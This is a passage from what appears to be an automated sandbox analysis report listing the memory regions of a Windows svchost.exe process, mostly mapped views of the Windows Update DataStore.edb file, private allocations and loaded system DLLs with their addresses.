= "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 2785 start_va = 0x9130000 end_va = 0x922ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009130000" filename = "" Region: id = 2786 start_va = 0x9230000 end_va = 0x923ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2787 start_va = 0x9240000 end_va = 0x924ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2788 start_va = 0x9250000 end_va = 0x925ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2789 start_va = 0x9260000 end_va = 0x926ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2790 start_va = 0x9270000 end_va = 0x927ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2791 start_va = 0x9280000 end_va = 0x928ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2792 start_va = 0x9290000 end_va = 0x929ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2793 start_va = 0x92a0000 end_va = 0x92affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2794 start_va = 0x92b0000 end_va = 0x92bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2795 start_va = 0x92c0000 end_va = 0x92c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000092c0000" filename = "" Region: id = 2796 start_va = 0x92d0000 end_va = 0x92dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2797 start_va = 0x92e0000 end_va = 0x92effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2798 start_va = 0x92f0000 end_va = 0x92fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2799 start_va = 0x9300000 end_va = 0x93fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009300000" filename = "" Region: id = 2800 start_va = 0x9400000 end_va = 0x94fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009400000" filename = "" Region: id = 2801 start_va = 0x9500000 end_va = 0x950ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2802 start_va = 0x9510000 end_va = 0x951ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2803 start_va = 0x9520000 end_va = 0x952ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2804 start_va = 0x9530000 end_va = 0x953ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2805 start_va = 0x9540000 end_va = 0x954ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2806 start_va = 0x9550000 end_va = 0x955ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2807 start_va = 0x9560000 end_va = 0x956ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2808 start_va = 0x9570000 end_va = 0x957ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2809 start_va = 0x9580000 end_va = 0x958ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2810 start_va = 0x9590000 end_va = 0x959ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2811 start_va = 0x95a0000 end_va = 0x95affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2812 start_va = 0x95b0000 end_va = 0x95bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2813 start_va = 0x95c0000 end_va = 0x95cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2814 start_va = 0x95d0000 end_va = 0x95dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2815 start_va = 0x95e0000 end_va = 0x95effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2816 start_va = 0x95f0000 end_va = 0x95fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2817 start_va = 0x9600000 end_va = 0x960ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2818 start_va = 0x9610000 end_va = 0x961ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2819 start_va = 0x9620000 end_va = 0x962ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2820 start_va = 0x9630000 end_va = 0x963ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2821 start_va = 0x9640000 end_va = 0x964ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2822 start_va = 0x9650000 end_va = 0x965ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2823 start_va = 0x9660000 end_va = 0x966ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2824 start_va = 0x9670000 end_va = 0x967ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2825 start_va = 0x9680000 end_va = 0x968ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2826 start_va = 0x9690000 end_va = 0x969ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2827 start_va = 0x96a0000 end_va = 0x96affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2828 start_va = 0x96b0000 end_va = 0x96bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2829 start_va = 0x96c0000 end_va = 0x96cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2830 start_va = 0x96d0000 end_va = 0x96dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2831 start_va = 0x96e0000 end_va = 0x96effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2832 start_va = 0x96f0000 end_va = 0x96f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096f0000" filename = "" Region: id = 2833 start_va = 0x9700000 end_va = 0x9703fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009700000" filename = "" Region: id = 2834 start_va = 0x9710000 end_va = 0x971ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2835 start_va = 0x9720000 end_va = 0x972ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2836 start_va = 0x9730000 end_va = 0x973ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2837 start_va = 0x9740000 end_va = 0x974ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2838 start_va = 0x9750000 end_va = 0x975ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2839 start_va = 0x9760000 end_va = 0x976ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2840 start_va = 0x9770000 end_va = 0x977ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2841 start_va = 0x9780000 end_va = 0x978ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2842 start_va = 0x9790000 end_va = 0x979ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2843 start_va = 0x97a0000 end_va = 0x97affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2844 start_va = 0x97b0000 end_va = 0x97bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2845 start_va = 0x97c0000 end_va = 0x97cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2846 start_va = 0x97d0000 end_va = 0x97dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2847 start_va = 0x97e0000 end_va = 0x97effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2848 start_va = 0x97f0000 end_va = 0x97fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2849 start_va = 0x9800000 end_va = 0x980ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2850 start_va = 0x9810000 end_va = 0x981ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2851 start_va = 0x9820000 end_va = 0x982ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2852 start_va = 0x9830000 end_va = 0x983ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2853 start_va = 0x9840000 end_va = 0x984ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2854 start_va = 0x9850000 end_va = 0x985ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2855 start_va = 0x9860000 end_va = 0x986ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2856 start_va = 0x9870000 end_va = 0x987ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2857 start_va = 0x9880000 end_va = 0x988ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2858 start_va = 0x9890000 end_va = 0x989ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2859 start_va = 0x98a0000 end_va = 0x98affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2860 start_va = 0x98b0000 end_va = 0x98bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2861 start_va = 0x98c0000 end_va = 0x98cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2862 start_va = 0x98d0000 end_va = 0x98dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2863 start_va = 0x98e0000 end_va = 0x98effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2864 start_va = 0x98f0000 end_va = 0x99effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098f0000" filename = "" Region: id = 2865 start_va = 0x99f0000 end_va = 0x99f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000099f0000" filename = "" Region: id = 2866 start_va = 0x9a00000 end_va = 0x9a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a00000" filename = "" Region: id = 2867 start_va = 0x9a10000 end_va = 0x9a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a10000" filename = "" Region: id = 2868 start_va = 0x9ba0000 end_va = 0x9c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ba0000" filename = "" Region: id = 2869 start_va = 0x9ca0000 end_va = 0x9d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ca0000" filename = "" Region: id = 2870 start_va = 0x9da0000 end_va = 0x9e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009da0000" filename = "" Region: id = 2871 start_va = 0x9ea0000 end_va = 0x9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ea0000" filename = "" Region: id = 2872 start_va = 0x9fa0000 end_va = 0xa09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 2873 start_va = 0xa0a0000 end_va = 0xa19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0a0000" filename = "" Region: id = 2874 start_va = 0xa1a0000 end_va = 0xa29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1a0000" filename = "" Region: id = 2875 start_va = 0xa2a0000 end_va = 0xa39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2a0000" filename = "" Region: id = 2876 start_va = 0xa3a0000 end_va = 0xa49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3a0000" filename = "" Region: id = 2877 start_va = 0xa4a0000 end_va = 0xa59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4a0000" filename = "" Region: id = 2878 start_va = 0xa600000 end_va = 0xa6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a600000" filename = "" Region: id = 2879 start_va = 0xa700000 end_va = 0xa7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a700000" filename = "" Region: id = 2880 start_va = 0xa800000 end_va = 0xa8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a800000" filename = "" Region: id = 2881 start_va = 0xa900000 end_va = 0xa9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a900000" filename = "" Region: id = 2882 start_va = 0xaa00000 end_va = 0xaafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aa00000" filename = "" Region: id = 2883 start_va = 0xab00000 end_va = 0xabfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ab00000" filename = "" Region: id = 2884 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2885 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2886 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2887 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2888 start_va = 0x7ff6c7f10000 end_va = 0x7ff6c7f1cfff monitored = 0 entry_point = 0x7ff6c7f13980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2889 start_va = 0x7ff8418a0000 end_va = 0x7ff8419bcfff monitored = 0 entry_point = 0x7ff8418cfe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 2890 start_va = 0x7ff8426e0000 end_va = 0x7ff842746fff monitored = 0 entry_point = 0x7ff8426eb160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 2891 start_va = 0x7ff844c00000 end_va = 0x7ff844c17fff monitored = 0 entry_point = 0x7ff844c04290 region_type = mapped_file name = "elscore.dll" filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll") Region: id = 2892 start_va = 0x7ff849170000 end_va = 0x7ff8491c1fff monitored = 0 entry_point = 0x7ff849173d30 region_type = mapped_file name = "cryptngc.dll" filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll") Region: id = 2893 start_va = 0x7ff849c10000 end_va = 0x7ff849c26fff monitored = 0 entry_point = 0x7ff849c16620 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 2894 start_va = 0x7ff849d70000 end_va = 0x7ff849d83fff monitored = 0 entry_point = 0x7ff849d75080 region_type = mapped_file name = "windows.staterepositorybroker.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryBroker.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorybroker.dll") Region: id = 2895 start_va = 0x7ff84a040000 end_va = 0x7ff84a23ffff monitored = 0 entry_point = 0x7ff84a0b5240 region_type = mapped_file name = "wlidsvc.dll" filename = "\\Windows\\System32\\wlidsvc.dll" (normalized: "c:\\windows\\system32\\wlidsvc.dll") Region: id = 2896 start_va = 0x7ff84adc0000 end_va = 0x7ff84b039fff monitored = 0 entry_point = 0x7ff84adda7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 2897 start_va = 0x7ff84b870000 end_va = 0x7ff84b882fff monitored = 0 entry_point = 0x7ff84b871b10 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 2898 start_va = 0x7ff84b890000 end_va = 0x7ff84b911fff monitored = 0 entry_point = 0x7ff84b891790 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 2899 start_va = 0x7ff84b920000 end_va = 0x7ff84b9a3fff monitored = 0 entry_point = 0x7ff84b932830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 2900 start_va = 0x7ff84b9b0000 end_va = 0x7ff84ba14fff monitored = 0 entry_point = 0x7ff84b9c3170 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 2901 start_va = 0x7ff84bc10000 end_va = 0x7ff84be45fff monitored = 0 entry_point = 0x7ff84bc9a450 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 2902 start_va = 0x7ff84be50000 end_va = 0x7ff84be71fff monitored = 0 entry_point = 0x7ff84be62540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 2903 start_va = 0x7ff84c020000 end_va = 0x7ff84c035fff monitored = 0 entry_point = 0x7ff84c02b550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 2904 start_va = 0x7ff84c270000 end_va = 0x7ff84c280fff monitored = 0 entry_point = 0x7ff84c277480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 2905 start_va = 0x7ff84c290000 end_va = 0x7ff84c313fff monitored = 0 entry_point = 0x7ff84c2a8d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2906 start_va = 0x7ff84c320000 end_va = 0x7ff84c335fff monitored = 0 entry_point = 0x7ff84c3255e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" 